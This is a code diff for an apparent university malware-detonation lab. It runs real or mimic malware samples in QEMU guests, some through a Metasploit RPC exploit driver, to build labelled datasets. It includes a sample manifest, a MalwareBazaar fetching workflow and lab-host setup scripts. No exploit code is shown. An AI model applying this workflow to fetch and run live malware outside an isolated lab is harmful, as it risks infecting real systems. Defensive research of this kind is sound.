+                slot_samples = [s for s in slot_samples if s.kind == "real"]
+                if not slot_samples:
+                    log.warning("require_real_samples: no real samples selected for this wave; skipping")
+                    continue
+
+            log.info(
+                "wave %d/%d: %s",
+                ep + 1, episodes,
+                [(i, s.name, s.kind) for i, s in enumerate(slot_samples)],
+            )
+
+            with ThreadPoolExecutor(max_workers=n_slots) as pool:
+                futures = [
+                    pool.submit(
+                        _run_slot, self.cfg, slot, sample, episode_index, capacity,
+                    )
+                    for slot, sample in enumerate(slot_samples)
+                ]
+                for fut in as_completed(futures):
+                    res = fut.result()
+                    log.info(
+                        "slot %d sample=%s rc=%d duration=%.1fs",
+                        res.slot, res.sample_name, res.rc, res.duration_s,
+                    )
+                    all_results.append(res)
+
+        total = time.monotonic() - t_start
+        return FleetRunResult(
+            capacity=capacity,
+            slots=all_results,
+            total_duration_s=total,
+        )
+
+
+# ---------------------------------------------------------------------------
+# Friendly capacity report (used by tools/run_fleet.py --capacity)
+# ---------------------------------------------------------------------------
+
+
+def capacity_report() -> str:
+    c = detect_capacity()
+    return (
+        f"cores: {c.cores_total} (reserve {c.cores_reserved})\n"
+        f"ram:   {c.ram_total_mib} MiB total, {c.ram_available_mib} MiB available "
+        f"(headroom {c.ram_headroom_mib} MiB, per-vm {c.ram_per_vm_mib} MiB)\n"
+        f"load:  1m={c.load_1m:.2f}\n"
+        f"caps:  by_cores={c.max_by_cores}, by_ram={c.max_by_ram}, "
+        f"by_load={c.max_by_load}\n"
+        f"--> max_concurrent VMs: {c.max_concurrent}\n"
+    )
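The capacity heuristic in `detect_capacity()` is easier to audit with the host probes factored out. The following is a minimal sketch that repeats the same arithmetic on explicit inputs. The function name `max_concurrent_vms` and its parameters are hypothetical and are not part of `orchestrator/fleet.py`.

```python
def max_concurrent_vms(
    cores_total: int,
    ram_total_mib: int,
    ram_available_mib: int,
    load_1m: float,
    ram_per_vm_mib: int = 320,
) -> tuple[int, str]:
    """Hypothetical helper: same arithmetic as detect_capacity(), no /proc reads.

    Returns (max_concurrent, binding), where binding names the cap that won.
    """
    cores_reserved = max(1, cores_total // 8)
    ram_headroom_mib = max(1024, ram_total_mib // 8)

    max_by_cores = max(0, cores_total - cores_reserved)
    if ram_per_vm_mib <= 0:
        max_by_ram = max_by_cores
    else:
        max_by_ram = max(0, (ram_available_mib - ram_headroom_mib) // ram_per_vm_mib)

    # A host that is already busy gets half the core-based cap, floor 1.
    if cores_total and load_1m / cores_total > 0.75:
        max_by_load = max(1, max_by_cores // 2)
    else:
        max_by_load = max_by_cores

    candidates = [max_by_cores, max_by_ram, max_by_load]
    best = min(candidates)
    return best, ["cores", "ram", "load"][candidates.index(best)]


# 8 cores, 16 GiB total, 12 GiB available, idle host: cores bind.
print(max_concurrent_vms(8, 16384, 12288, 0.5))
# 8 cores, 4 GiB total, 2 GiB available: RAM binds.
print(max_concurrent_vms(8, 4096, 2048, 0.5))
# Same large host, but load_1m / cores = 0.875: load binds.
print(max_concurrent_vms(8, 16384, 12288, 7.0))
```

On ties the first matching cap in the order cores, ram, load is reported as binding, which matches the `candidates.index(...)` lookup in the diff.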
--- a/pyproject.toml
+++ b/pyproject.toml
@ -6,6 +6,7 @@ requires-python = ">=3.11"
 dependencies = [
    "starlette>=0.36",
    "uvicorn[standard]>=0.27",
+    "msgpack>=1.0",  # MSF RPC wire format for the Tier-3 exploit driver
 ]

 [dependency-groups]
--- a/receiver/app.py
+++ b/receiver/app.py
@ -2,6 +2,7 @@ from __future__ import annotations

 import logging
 import secrets
+import time
 from pathlib import Path
 from typing import Awaitable, Callable

@ -17,6 +18,7 @@ log = logging.getLogger("cis490.receiver")


 SUFFIX = ".tar.zst"
+SCHEMA_VERSION = 1


 def _bearer_check(request: Request, expected: str | None) -> Response | None:
@ -40,6 +42,23 @@ def make_app(
    async def health(request: Request) -> JSONResponse:
        return JSONResponse({"status": "ok"})

+    async def ping(request: Request) -> JSONResponse:
+        """Smoke-test endpoint. Verifies that the auth layer and the
+        WG/Caddy/receiver pipe are alive end-to-end without persisting
+        anything — index.jsonl is untouched. Used by ``cis490-shipper
+        --ping`` during initial bring-up of a new lab host."""
+        guard = _bearer_check(request, bearer_token)
+        if guard is not None:
+            return guard
+        return JSONResponse(
+            {
+                "ok": True,
+                "host_id": request.headers.get("x-lab-host"),
+                "t_wall_ns": time.time_ns(),
+                "schema_version": SCHEMA_VERSION,
+            }
+        )
+
    async def put_episode(request: Request) -> JSONResponse:
        guard = _bearer_check(request, bearer_token)
        if guard is not None:
@ -124,6 +143,7 @@ def make_app(

    routes = [
        Route("/v1/health", health, methods=["GET"]),
+        Route("/v1/ping", ping, methods=["POST"]),
        Route(
            "/v1/episodes/{host_id}/{filename}",
            put_episode,
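A client-side view of the new `/v1/ping` route may help when bringing up a lab host. The sketch below only builds the request and does not send it. The helper name `build_ping_request` and the example base URL are hypothetical. The `Authorization: Bearer` header format is an assumption, because the body of `_bearer_check` is not shown in this diff. The `x-lab-host` header name comes from the handler above.

```python
import urllib.request


def build_ping_request(base_url: str, token: str, host_id: str) -> urllib.request.Request:
    """Hypothetical helper: build (but do not send) a POST to /v1/ping."""
    return urllib.request.Request(
        url=base_url.rstrip("/") + "/v1/ping",
        data=b"",  # the handler reads no body; an empty payload is enough
        method="POST",
        headers={
            # Assumed scheme; check _bearer_check for the exact format.
            "Authorization": f"Bearer {token}",
            # Echoed back by the handler as "host_id".
            "X-Lab-Host": host_id,
        },
    )


req = build_ping_request("https://collector.example/", "s3cret", "lab-01")
print(req.get_method(), req.full_url)
```

Passing the request to `urllib.request.urlopen` against a running receiver should return a JSON body with the `ok`, `host_id`, `t_wall_ns`, and `schema_version` keys shown in the handler, and nothing is persisted.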
--- a/samples/README.md
+++ b/samples/README.md
@ -1,33 +1,107 @@
 # samples/

-**Sample binaries are NEVER committed to this repo.** This directory holds:
+Catalog of malware (or behaviour-matched mimics) the fleet draws from.
+**Sample binaries are NEVER committed to this repo.**

- `manifest.yaml` — sha256-pinned list of samples to fetch, with metadata
-  (source, category, expected behavior, target CVE).
- `fetch.py` — script that pulls samples from configured sources
-  (MalwareBazaar, theZoo, vx-underground), verifies sha256, and stores them
-  under `samples/store/` (gitignored).
- Per-sample notes in markdown describing observed behavior in our lab.
+## What's here

-`samples/store/` lives only on the lab host. It is gitignored *and* should
-sit on a disk that is not auto-mounted on developer workstations.
-
-## Manifest entry shape (placeholder)
-
-```yaml
-samples:
-  - name: linux.miner.xmrig.elf
-    sha256: "..."                # pinned
-    source: MalwareBazaar
-    category: miner
-    target_cve: null              # cryptominers are usually post-exploit payloads
-    behavior: "high CPU, periodic stratum protocol traffic"
-    pairs_with_exploit: exploit/multi/samba/usermap_script
 ```
+manifest.toml      schema-checked catalog (loaded by samples/manifest.py)
+manifest.py        loader + per-(host_id, slot, ep) deterministic selection
+store/             SHA-256-pinned binary content (gitignored — never commit)
+.bazaar.token      MalwareBazaar API key (mode 0600, gitignored)
+```
+
+## Manifest schema
+
+Each entry in `manifest.toml`:
+
+```toml
+[[sample]]
+name        = "xmrig-cryptominer"   # unique within manifest, DNS-safe
+family      = "XMRig"               # canonical family label for ML
+category    = "cryptominer"         # one of: cryptominer, botnet, ransomware,
+                                    # banking-trojan, fileless, rat, worm,
+                                    # loader, wiper, other
+profile     = "cpu-saturate"        # behaviour profile from
+                                    # exploits/workloads.py — gates the
+                                    # in-session shell workload when no
+                                    # real binary is staged
+description = "..."
+
+# Optional — present iff this is a real binary the fetcher should pull:
+sha256 = "abc123..."
+source = "MalwareBazaar"
+url    = "https://bazaar.abuse.ch/sample/abc123/"
+```
+
+The loader rejects unknown categories and duplicate names. See
+`tests/test_fleet.py` for the property tests covering selection
+distribution + catalog walkability.
+
+## "real" vs "mimic"
+
+`Sample.kind` is **`"real"`** when `sha256` is set, otherwise **`"mimic"`**.
+
+- **Mimic** — the orchestrator runs the matching profile-shaped shell
+  command (cpu-saturate / scan-and-dial / io-walk / bursty-c2 /
+  low-and-slow / shell-resident) inside the guest. No real binary
+  needed; useful right now for testing the dataset pipeline and as
+  the realistic-but-safe envelope class the trainer expects.
+- **Real** — the orchestrator's Tier-3+ driver chunked-uploads
+  `samples/store/<sha256>` into the shell session, sha256-verifies on
+  the guest side, and execs it. Hash mismatch fail-stops the run; a
+  tampered binary is never executed.
+
+`meta.sample.kind` lands in every episode's `meta.json`, so trainers
+can stratify on it (the realistic-model path consumes only
+`kind == "real"` episodes by default).
+
+## Fetching a real binary
+
+```sh
+# 1. Register a (free) account at https://bazaar.abuse.ch and get the API key.
+echo "<your-key>" > samples/.bazaar.token
+chmod 0600 samples/.bazaar.token
+
+# 2. Add an entry with sha256+source+url to manifest.toml.
+
+# 3. Pull the binary into samples/store/<sha256>:
+uv run python tools/fetch_sample.py <sha256>
+```
+
+Idempotent — re-running checks the staged copy's sha256 and skips the
+download if it already matches.
+
+## Per-(host, slot, episode) selection
+
+`manifest.py::SampleManifest.select(host_id, slot, episode_index)`
+hashes those three into a uniform integer and indexes the catalog
+modulo its length N. Two lab hosts on the same slot usually pick
+*different* samples (collision rate ~1/N). Each pick is an independent
+uniform draw, so a single host is expected to cover the whole catalog
+in roughly N·ln(N) episodes rather than exactly `len(manifest)`.
+No coordinator.

 ## Safety rules

- Only download to the lab host, never to a developer workstation.
- Verify sha256 immediately, before any other read.
- Keep the directory on a path that is *not* on the WG overlay.
- Re-verify sha256 before each detonation; refuse to run on mismatch.
+- **Only download to a lab host, never to a developer workstation.**
+  `samples/store/` lives only there, gitignored, on a disk that is
+  not auto-mounted elsewhere.
+- The lab host's `br-malware` bridge is host-only by design (no NAT,
+  no route). Real malware running in the guest cannot call out unless
+  the operator explicitly opens egress, which we don't.
+- Snapshot/revert (see `EpisodeConfig.revert_at_*` + `qmp.savevm`/
+  `loadvm`) means every fresh episode starts from a known-good
+  baseline regardless of what the previous one did to the guest.
+- The fetcher verifies sha256 on download; the driver verifies again
+  in-guest before exec. Both layers must match the manifest.
+
+## Adding a sample
+
+1. Pick a `family` label and a `category` from the closed enum above.
+2. Pick a `profile` from `exploits/workloads.all_profiles()`. If the
+   sample's behaviour doesn't match any of the six existing shapes,
+   add a new factory to `exploits/workloads.py` *first*, with tests.
+3. (Real-only) Compute `sha256`, fetch via `tools/fetch_sample.py`,
+   verify the staged file's hash matches.
+4. Append the entry to `manifest.toml`.
+5. Run the test suite — the manifest loader's invariants catch typos.
--- a/samples/init.py
+++ b/samples/init.py
--- a/samples/manifest.py
+++ b/samples/manifest.py
@ -0,0 +1,113 @@
+"""Sample manifest loader + per-(host, slot) deterministic selection.
+
+The manifest at ``samples/manifest.toml`` defines the catalog of
+samples (real or mimic) the fleet draws from. Selection is
+**deterministic** given ``(host_id, slot, episode_index)``, so two lab
+hosts on the same fleet usually pick *different* samples for the same
+slot index (collision rate ~1/N), and replaying the same inputs always
+yields the same sample.
+
+This gives us "all hosts on the network generating novel data" without
+needing a coordinator: every host's `host_id` seeds its own
+sample-rotation order, and the orderings spread across the catalog.
+"""
+
+from __future__ import annotations
+
+import hashlib
+import tomllib
+from dataclasses import dataclass, field
+from pathlib import Path
+
+
+_VALID_CATEGORIES = {
+    "cryptominer", "botnet", "ransomware", "banking-trojan",
+    "fileless", "rat", "worm", "loader", "wiper", "other",
+}
+
+
+@dataclass(frozen=True)
+class Sample:
+    name: str
+    family: str
+    category: str
+    profile: str
+    description: str = ""
+    source: str | None = None
+    sha256: str | None = None
+    url: str | None = None
+
+    @property
+    def kind(self) -> str:
+        """``"real"`` if a sha256-pinned binary is expected, else ``"mimic"``.
+        Trainers filter on this so the realistic-model pipeline only
+        consumes real-malware episodes."""
+        return "real" if self.sha256 else "mimic"
+
+    def binary_path(self, store_root: Path) -> Path | None:
+        """Resolved path of the staged binary, or None if this sample
+        has no sha256 (mimic) or the binary hasn't been fetched yet."""
+        if not self.sha256:
+            return None
+        p = Path(store_root) / self.sha256
+        return p if p.exists() else None
+
+
+@dataclass(frozen=True)
+class SampleManifest:
+    samples: list[Sample] = field(default_factory=list)
+
+    def __len__(self) -> int:
+        return len(self.samples)
+
+    def select(self, *, host_id: str, slot: int, episode_index: int = 0) -> Sample:
+        """Deterministic selection. The host_id mixes into the seed so
+        different hosts visit the catalog in different orders; slot +
+        episode_index tick within a host. Same inputs always give the
+        same sample — replay-friendly for debugging."""
+        if not self.samples:
+            raise ValueError("manifest is empty")
+        # SHA-256 of the seed gives a uniformly distributed integer.
+        seed = f"{host_id}|{slot}|{episode_index}".encode()
+        h = hashlib.sha256(seed).digest()
+        idx = int.from_bytes(h[:8], "big") % len(self.samples)
+        return self.samples[idx]
+
+    @classmethod
+    def load(cls, path: str | Path) -> "SampleManifest":
+        with open(path, "rb") as f:
+            data = tomllib.load(f)
+        raw = data.get("sample") or []
+        if not isinstance(raw, list):
+            raise ValueError(f"{path}: 'sample' must be an array of tables")
+
+        samples: list[Sample] = []
+        for i, entry in enumerate(raw):
+            if not isinstance(entry, dict):
+                raise ValueError(f"{path}: sample[{i}] is not a table")
+            for key in ("name", "family", "category", "profile"):
+                if not isinstance(entry.get(key), str) or not entry[key]:
+                    raise ValueError(f"{path}: sample[{i}] missing or empty '{key}'")
+            if entry["category"] not in _VALID_CATEGORIES:
+                raise ValueError(
+                    f"{path}: sample[{i}] category {entry['category']!r} "
+                    f"not in {sorted(_VALID_CATEGORIES)}"
+                )
+            samples.append(Sample(
+                name=entry["name"],
+                family=entry["family"],
+                category=entry["category"],
+                profile=entry["profile"],
+                description=entry.get("description", ""),
+                source=entry.get("source"),
+                sha256=entry.get("sha256"),
+                url=entry.get("url"),
+            ))
+
+        # Reject duplicate names — trainers join on this.
+        seen: set[str] = set()
+        for s in samples:
+            if s.name in seen:
+                raise ValueError(f"{path}: duplicate sample name {s.name!r}")
+            seen.add(s.name)
+
+        return cls(samples=samples)
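`Sample.binary_path` only checks that the staged file exists; it does not re-hash it. The README's safety rules call for a hash check before execution, which could be sketched as below. `staged_binary_ok` is a hypothetical helper, not something this commit adds.

```python
import hashlib
from pathlib import Path


def staged_binary_ok(store_root: Path, sha256: str, chunk: int = 1 << 20) -> bool:
    """True iff store_root/<sha256> exists and its content hashes to sha256.

    Hypothetical helper; reads in chunks so large binaries are not loaded whole.
    """
    path = Path(store_root) / sha256
    if not path.is_file():
        return False
    digest = hashlib.sha256()
    with path.open("rb") as f:
        while block := f.read(chunk):
            digest.update(block)
    return digest.hexdigest() == sha256.lower()
```

A caller would treat `False` as fail-stop, matching the "hash mismatch fail-stops the run" behaviour the README describes for real samples.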
--- a/samples/manifest.toml
+++ b/samples/manifest.toml
@ -0,0 +1,61 @@
+# Sample manifest — what each fleet slot picks from.
+#
+# Each entry has three things:
+#   - identity (name, family, category) for labeling
+#   - acquisition (source, sha256, url) for reproducibility
+#   - behaviour (profile) so the synthetic load mimic can run a
+#     reasonable proxy until the real sample lands at samples/store/
+#
+# When the real malware binary is present at samples/store/<sha256>,
+# the orchestrator runs THAT inside the guest. When it's absent, the
+# orchestrator falls back to running tools/load_mimic.py with the
+# matching profile so the fleet still produces *labeled, varied* data
+# while we collect the real samples. Either way, meta.json records
+# which path the episode took, so trainers can filter on
+# meta.sample.kind ∈ {real, mimic}.
+
+[[sample]]
+name = "xmrig-cryptominer"
+family = "XMRig"
+category = "cryptominer"
+profile = "cpu-saturate"
+# A real XMRig fetch goes here when MalwareBazaar pull is wired up:
+# source = "MalwareBazaar"
+# sha256 = "TBD"
+# url    = "https://bazaar.abuse.ch/sample/TBD/"
+description = "Sustained 1-vCPU saturation, very low IO/net. Pure compute."
+
+[[sample]]
+name = "mirai-class-bot"
+family = "Mirai"
+category = "botnet"
+profile = "scan-and-dial"
+description = "SYN scans across the bridge IP space + periodic dial-home. High net, low CPU."
+
+[[sample]]
+name = "ransomware-mimic"
+family = "Cryptolocker-class"
+category = "ransomware"
+profile = "io-walk"
+description = "Heavy disk write + filesystem walk producing a per-file overwrite envelope."
+
+[[sample]]
+name = "dridex-class-trojan"
+family = "Dridex"
+category = "banking-trojan"
+profile = "bursty-c2"
+description = "Long idle, periodic short bursts of TCP egress to a fixed peer (C2 beacon shape)."
+
+[[sample]]
+name = "kovter-class-stealth"
+family = "Kovter"
+category = "fileless"
+profile = "low-and-slow"
+description = "Low CPU, periodic memory churn, no persistent on-disk artifacts. Hardest to label from /proc alone."
+
+[[sample]]
+name = "reverse-shell-resident"
+family = "Reverse-Shell"
+category = "rat"
+profile = "shell-resident"
+description = "Single TCP socket pinned to an attacker IP, occasional command bursts."
--- a/scripts/fetch-alpine-baseline.sh
+++ b/scripts/fetch-alpine-baseline.sh
@ -0,0 +1,62 @@
+#!/usr/bin/env bash
+# Fetch the Alpine 3.21 NoCloud cloud-init image used as the Tier-1/2
+# baseline guest. The upstream artifact is already qcow2, so no
+# conversion is needed; verify sha512 against the SHA512 value pinned
+# below (see also docs/sources.md).
+#
+# Usage:
+#   scripts/fetch-alpine-baseline.sh <out_path>
+#
+# Examples:
+#   scripts/fetch-alpine-baseline.sh vm/images/alpine-baseline.qcow2
+#   sudo scripts/fetch-alpine-baseline.sh /var/lib/cis490/vm/images/alpine-baseline.qcow2
+#
+# Idempotent — re-runs check the destination and short-circuit if the
+# checksum already matches.
+
+set -euo pipefail
+
+OUT="${1:-}"
+if [[ -z "$OUT" ]]; then
+    echo "usage: $0 <out_path>" >&2
+    exit 2
+fi
+
+URL="https://dl-cdn.alpinelinux.org/alpine/v3.21/releases/cloud/nocloud_alpine-3.21.0-x86_64-bios-cloudinit-r0.qcow2"
+SHA512="bb509092cda3548c11bc48a2168ce950d654b50db006e98939c06a5d86487f4e53cbb7954fafbba9ab5c8098008a9f304421ffc3397b0bc1d87b6aa309239b98"
+
+log() { printf '[fetch-alpine] %s\n' "$*" >&2; }
+
+if [[ -f "$OUT" ]]; then
+    actual="$(sha512sum "$OUT" | awk '{print $1}')"
+    if [[ "$actual" == "$SHA512" ]]; then
+        log "$OUT already present and verified"
+        exit 0
+    fi
+    log "$OUT exists but checksum differs — refetching"
+    rm -f "$OUT"
+fi
+
+mkdir -p "$(dirname "$OUT")"
+TMP="$OUT.partial"
+trap 'rm -f "$TMP"' EXIT
+
+log "downloading $URL"
+if command -v curl >/dev/null; then
+    curl -fL --retry 3 --retry-delay 5 -o "$TMP" "$URL"
+elif command -v wget >/dev/null; then
+    wget -O "$TMP" "$URL"
+else
+    log "neither curl nor wget on PATH"
+    exit 1
+fi
+
+log "verifying sha512"
+actual="$(sha512sum "$TMP" | awk '{print $1}')"
+if [[ "$actual" != "$SHA512" ]]; then
+    log "sha512 mismatch: expected $SHA512, got $actual"
+    exit 1
+fi
+
+mv "$TMP" "$OUT"
+trap - EXIT
+log "wrote $OUT ($(stat -c%s "$OUT") bytes)"
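The script above follows a "download to `.partial`, verify, then rename" pattern so a bad file never sits at the destination. A Python rendering of the same idea, using in-memory bytes instead of a network fetch, might look like this. `install_verified` is a hypothetical name and this is a sketch, not a port of the script.

```python
import hashlib
import os
from pathlib import Path


def install_verified(payload: bytes, out: Path, expected_sha512: str) -> bool:
    """Write payload to `out` only if its sha512 matches.

    Returns False when `out` is already present and verified (nothing to do),
    True when a new file was installed. Raises ValueError on a hash mismatch.
    """
    if out.is_file() and hashlib.sha512(out.read_bytes()).hexdigest() == expected_sha512:
        return False
    out.parent.mkdir(parents=True, exist_ok=True)
    tmp = out.with_name(out.name + ".partial")
    try:
        tmp.write_bytes(payload)
        if hashlib.sha512(payload).hexdigest() != expected_sha512:
            raise ValueError("sha512 mismatch")
        os.replace(tmp, out)  # atomic when tmp and out share a filesystem
        return True
    finally:
        # Mirrors the script's EXIT trap: never leave a .partial behind.
        tmp.unlink(missing_ok=True)
```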
--- a/scripts/fetch-metasploitable2.sh
+++ b/scripts/fetch-metasploitable2.sh
@ -0,0 +1,69 @@
+#!/usr/bin/env bash
+# Fetch + sha256-verify the Metasploitable2 disk image.
+#
+# Rapid7's official download is gated behind a registration form, so
+# we take the URL + sha256 from env vars; both are required and have
+# no defaults. The user installs this once per lab host.
+#
+# Inputs (env):
+#   IMAGE_URL  — direct download URL for the metasploitable2 archive
+#   IMAGE_SHA256 — expected sha256 of the archive
+#   OUT_DIR    — where to drop the qcow2 (default vm/images/)
+#
+# Outputs:
+#   $OUT_DIR/metasploitable2.qcow2 — converted from the original VMDK
+#                                    if needed.
+#
+# We do NOT bake an image url+hash into the repo because the canonical
+# distribution is a registration-walled zip on Rapid7. Operators must
+# supply both; the rest is mechanical.
+
+set -euo pipefail
+
+IMAGE_URL="${IMAGE_URL:-}"
+IMAGE_SHA256="${IMAGE_SHA256:-}"
+OUT_DIR="${OUT_DIR:-$(cd "$(dirname "$0")/../vm/images" 2>/dev/null && pwd)}"
+WORK_DIR="${WORK_DIR:-/tmp/cis490-metasploitable-fetch}"
+
+log() { printf '[fetch-metasploitable2] %s\n' "$*" >&2; }
+die() { log "FATAL: $*"; exit 1; }
+
+[[ -n "$IMAGE_URL" ]] || die "set IMAGE_URL to the Metasploitable2 download URL"
+[[ -n "$IMAGE_SHA256" ]] || die "set IMAGE_SHA256 to the expected sha256 of the archive"
+
+mkdir -p "$OUT_DIR" "$WORK_DIR"
+
+ARCHIVE="$WORK_DIR/$(basename "$IMAGE_URL")"
+if [[ -f "$ARCHIVE" ]]; then
+    log "archive already present; skipping download"
+else
+    log "downloading $IMAGE_URL → $ARCHIVE"
+    curl -fL --retry 3 --retry-delay 5 -o "$ARCHIVE.partial" "$IMAGE_URL"
+    mv "$ARCHIVE.partial" "$ARCHIVE"
+fi
+
+log "verifying sha256"
+ACTUAL="$(sha256sum "$ARCHIVE" | awk '{print $1}')"
+if [[ "$ACTUAL" != "$IMAGE_SHA256" ]]; then
+    die "sha256 mismatch: expected $IMAGE_SHA256, got $ACTUAL"
+fi
+log "sha256 ok"
+
+# Extract — handle either zip or 7z, since various mirrors choose one
+# or the other.
+case "$ARCHIVE" in
+    *.zip) ( cd "$WORK_DIR" && unzip -o "$ARCHIVE" ) ;;
+    *.7z|*.7zip) command -v 7z >/dev/null || die "7z not installed"; \
+                 ( cd "$WORK_DIR" && 7z x -y "$ARCHIVE" ) ;;
+    *) die "unsupported archive type: $ARCHIVE" ;;
+esac
+
+VMDK="$(find "$WORK_DIR" -name 'Metasploitable*.vmdk' -print -quit)"
+[[ -n "$VMDK" ]] || die "no Metasploitable*.vmdk in extracted archive"
+
+log "converting $VMDK → qcow2"
+command -v qemu-img >/dev/null || die "qemu-img required (apt install qemu-utils)"
+qemu-img convert -O qcow2 "$VMDK" "$OUT_DIR/metasploitable2.qcow2"
+
+log "done: $OUT_DIR/metasploitable2.qcow2"
+log "Tier-3 ready when msfrpcd is up. See scripts/install-msfrpcd.sh."
--- a/scripts/install-lab-host.sh
+++ b/scripts/install-lab-host.sh
@ -0,0 +1,234 @@
+#!/usr/bin/env bash
+# Install / refresh the CIS490 lab-host role.
+#
+# Idempotent — safe to re-run after `git pull`. Does NOT enroll the
+# host into WireGuard (that's wg-enroll's job, run separately and
+# *first*) and does NOT mint TLS certs (that's wg-pki's job).
+#
+# Steps:
+#   1. Verify prereqs (KVM, zstd, qemu, python3.11+, systemd).
+#   2. Create the cis490 service user + /var/lib/cis490 layout.
+#   3. Sync the repo into /opt/cis490 and build a uv-managed venv.
+#   4. Install systemd units from etc/.
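+#   5. Drop /etc/cis490/lab-host.toml (only on first install).
+#   6. Write /etc/cis490/lab-host.env; provision br-malware + tap pool.
+#   7. Fetch the mTLS leaf cert from bootstrap.wg once host_id is set.
+#   8. Fetch the Alpine baseline image and build cidata.iso (best-effort).
+#
+# Operator finishes by:
+#   - editing /etc/cis490/lab-host.toml (host_id, receiver URL, certs)
+#   - placing leaf certs at
+#     /etc/cis490/certs/{lab-host.pem,lab-host.key,wg-ca.pem}
+#     if the auto-fetch in step 7 was skipped
+#   - `systemctl enable --now cis490-shipper cis490-orchestrator`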
+
+set -euo pipefail
+
+REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
+INSTALL_ROOT="${INSTALL_ROOT:-/opt/cis490}"
+DATA_ROOT="${DATA_ROOT:-/var/lib/cis490}"
+ETC_ROOT="${ETC_ROOT:-/etc/cis490}"
+SERVICE_USER="${SERVICE_USER:-cis490}"
+
+log() { printf '[install-lab-host] %s\n' "$*" >&2; }
+die() { log "FATAL: $*"; exit 1; }
+
+# --- 1. prereqs --------------------------------------------------------
+log "checking prereqs"
+
+if [[ $EUID -ne 0 ]]; then
+    die "must run as root (writes to /opt, /etc, /var/lib, and systemd)"
+fi
+command -v systemctl >/dev/null || die "systemd not found"
+command -v qemu-system-x86_64 >/dev/null || die "qemu-system-x86_64 not on PATH"
+command -v zstd >/dev/null || die "zstd not on PATH (apt install zstd)"
+[[ -e /dev/kvm ]] || die "/dev/kvm missing — KVM not available"
+
+# uv is preferred (lockfile-driven). Fall back to system pip if absent.
+USE_UV=0
+if command -v uv >/dev/null; then USE_UV=1; fi
+
+# --- 2. user + layout --------------------------------------------------
+log "ensuring service user $SERVICE_USER"
+if ! id -u "$SERVICE_USER" >/dev/null 2>&1; then
+    useradd --system --no-create-home --shell /usr/sbin/nologin \
+        --home-dir "$INSTALL_ROOT" "$SERVICE_USER"
+fi
+# kvm group lets the service spawn VMs.
+if getent group kvm >/dev/null 2>&1; then
+    usermod -a -G kvm "$SERVICE_USER" || true
+fi
+
+install -d -o root -g root -m 0755 "$ETC_ROOT" "$ETC_ROOT/certs"
+install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 \
+    "$DATA_ROOT" "$DATA_ROOT/data" \
+    "$DATA_ROOT/data/episodes" "$DATA_ROOT/data/outbox" \
+    "$DATA_ROOT/data/shipped" "$DATA_ROOT/data/queue" \
+    "$DATA_ROOT/samples" "$DATA_ROOT/samples/store" \
+    "$DATA_ROOT/vm" "$DATA_ROOT/vm/images"
+
+# --- 3. repo + venv ----------------------------------------------------
+log "syncing repo into $INSTALL_ROOT"
+install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 "$INSTALL_ROOT"
+# We use a clean cp -aT rather than rsync to avoid an extra dep.
+cp -aT "$REPO_ROOT" "$INSTALL_ROOT"
+chown -R "$SERVICE_USER":"$SERVICE_USER" "$INSTALL_ROOT"
+
+log "building venv"
+if [[ "$USE_UV" -eq 1 ]]; then
+    sudo -u "$SERVICE_USER" -- env HOME="$INSTALL_ROOT" \
+        uv sync --project "$INSTALL_ROOT"
+else
+    sudo -u "$SERVICE_USER" -- python3 -m venv "$INSTALL_ROOT/.venv"
+    sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
+        --quiet --upgrade pip
+    sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
+        --quiet starlette 'uvicorn[standard]' httpx msgpack
+fi
+
+# --- 4. systemd --------------------------------------------------------
+log "installing systemd units"
+install -m 0644 "$REPO_ROOT/etc/cis490-shipper.service" \
+    /etc/systemd/system/cis490-shipper.service
+install -m 0644 "$REPO_ROOT/etc/cis490-orchestrator.service" \
+    /etc/systemd/system/cis490-orchestrator.service
+systemctl daemon-reload
+
+# --- 5. config template (only on first install) -----------------------
+if [[ ! -f "$ETC_ROOT/lab-host.toml" ]]; then
+    log "writing $ETC_ROOT/lab-host.toml (template)"
+    install -m 0640 -o root -g "$SERVICE_USER" \
+        "$REPO_ROOT/etc/lab-host.toml.example" "$ETC_ROOT/lab-host.toml"
+    NEW_INSTALL=1
+else
+    log "$ETC_ROOT/lab-host.toml exists; leaving in place"
+    NEW_INSTALL=0
+fi
+
+# --- 6. orchestrator env file (read by cis490-orchestrator.service) ----
+ENV_FILE="$ETC_ROOT/lab-host.env"
+DEFAULT_HOST_ID="$(hostname -s)"
+if [[ ! -f "$ENV_FILE" ]]; then
+    log "writing $ENV_FILE (host_id defaults to $DEFAULT_HOST_ID — edit if you want something else)"
+    install -m 0640 -o root -g "$SERVICE_USER" /dev/stdin "$ENV_FILE" <<EOF
+# Read by cis490-orchestrator.service. Override per-host as needed.
+FLEET_HOST_ID=$DEFAULT_HOST_ID
+# BRIDGE=br-malware enables source 4 pcap capture AND unlocks the
+# Tier-3 modules whose payloads need callback (reverse/bind shells).
+# install-lab-host.sh provisions the bridge + tap pool below; leave
+# this on unless your lab host can't run NETLINK ops.
+BRIDGE=br-malware
+EOF
+fi
+
+# --- 6b. host-only bridge + per-slot tap pool --------------------------
+# br-malware lets pcap capture the guest traffic and lets bind/reverse
+# shell payloads route between guest and host. We pre-create a small
+# pool of taps so the launchers don't need sudo to attach interfaces;
+# each slot N uses cis490tap<N> (Tier-2 demo) and cis490target<N>
+# (Tier-3 target). Idempotent: re-running on an already-set-up host
+# is a no-op.
+if command -v ip >/dev/null && [[ -x "$REPO_ROOT/vm/setup_bridge.sh" ]]; then
+    if "$REPO_ROOT/vm/setup_bridge.sh" >/dev/null 2>&1; then
+        log "bridge br-malware ready"
+        for n in 0 1 2 3 4 5 6 7; do
+            for prefix in cis490tap cis490target; do
+                tap="${prefix}${n}"
+                if ! ip link show "$tap" >/dev/null 2>&1; then
+                    ip tuntap add dev "$tap" mode tap user "$SERVICE_USER" 2>/dev/null || \
+                        ip tuntap add dev "$tap" mode tap 2>/dev/null || true
+                    ip link set "$tap" master br-malware 2>/dev/null || true
+                    ip link set "$tap" up 2>/dev/null || true
+                fi
+            done
+        done
+        log "tap pool: cis490tap0..7 + cis490target0..7 attached to br-malware"
+    else
+        log "WARN: setup_bridge.sh failed; BRIDGE mode will be unavailable"
+        # Comment out BRIDGE in the env file — fleet will still run
+        # Tier-2 + non-callback Tier-3 modules.
+        sed -i 's/^BRIDGE=br-malware/# BRIDGE=br-malware  # auto-disabled: bridge setup failed/' "$ENV_FILE"
+    fi
+fi
+
